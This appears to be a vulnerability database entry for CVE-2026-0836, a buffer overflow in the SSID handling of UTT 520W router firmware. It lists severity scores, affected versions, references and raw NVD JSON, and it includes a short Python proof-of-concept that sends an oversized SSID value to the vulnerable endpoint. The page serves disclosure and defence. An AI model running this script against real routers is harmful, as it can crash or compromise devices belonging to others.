CVE-2026-0836

Description

A vulnerability was determined in UTT 进取 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formConfigFastDirectionW. This manipulation of the argument ssid causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:520w_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

UTT 进取 520W 固件 1.7.7-180627 及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
'''
CVE-2026-0836 PoC - Buffer Overflow in UTT Router /goform/formConfigFastDirectionW
Target: UTT 进取 520W Firmware 1.7.7-180627
Vulnerability: strcpy buffer overflow via ssid parameter
CVSS: 8.8 (High)
'''

import requests
import sys

def exploit_buffer_overflow(target_ip, ssid_payload_length=500):
    """Exploit buffer overflow in formConfigFastDirectionW"""
    target_url = f"http://{target_ip}/goform/formConfigFastDirectionW"
    
    # Generate overflow payload - A's to overflow buffer
    overflow_payload = "A" * ssid_payload_length
    
    # Construct POST data with vulnerable parameter
    post_data = {
        "ssid": overflow_payload,
        # Other parameters may be needed
        "action": "save"
    }
    
    try:
        print(f"[*] Sending exploit payload to {target_url}")
        print(f"[*] Payload length: {ssid_payload_length} bytes")
        
        response = requests.post(target_url, data=post_data, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        return response
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [payload_length]")
        sys.exit(1)
    
    target = sys.argv[1]
    length = int(sys.argv[2]) if len(sys.argv) > 2 else 500
    
    exploit_buffer_overflow(target, length)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0836
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0836
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0836/
[4] VulDB https://vuldb.com/cve/CVE-2026-0836
[5] https://github.com/Lena-lyy/cve/blob/main/1223/26.md
[6] https://vuldb.com/?ctiid.340436
[7] https://vuldb.com/?id.340436
[8] https://vuldb.com/?submit.729018

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0836", "sourceIdentifier": "[email protected]", "published": "2026-01-11T05:15:47.947", "lastModified": "2026-01-13T22:04:12.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in UTT 进取 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formConfigFastDirectionW. This manipulation of the argument ssid causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en UTT ?? 520W 1.7.7-180627. El elemento afectado es la función strcpy del archivo /goform/formConfigFastDirectionW. Esta manipulación del argumento ssid causa desbordamiento de búfer. La explotación remota del ataque es posible. El exploit ha sido divulgado públicamente y puede ser utilizado. El proveedor fue contactado con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:520w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-180627", "matchCriteriaId": "1ED9CE5B-AC0E-4C53-A084-7777D5050400"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DD42AC5F-531F-40FC-BD78-D20F298AF79A"}]}]}], "references": [{"url": "https://github.com/Lena-lyy/cve/blob/main/1223/26.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.340436", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.340436", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.729018", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}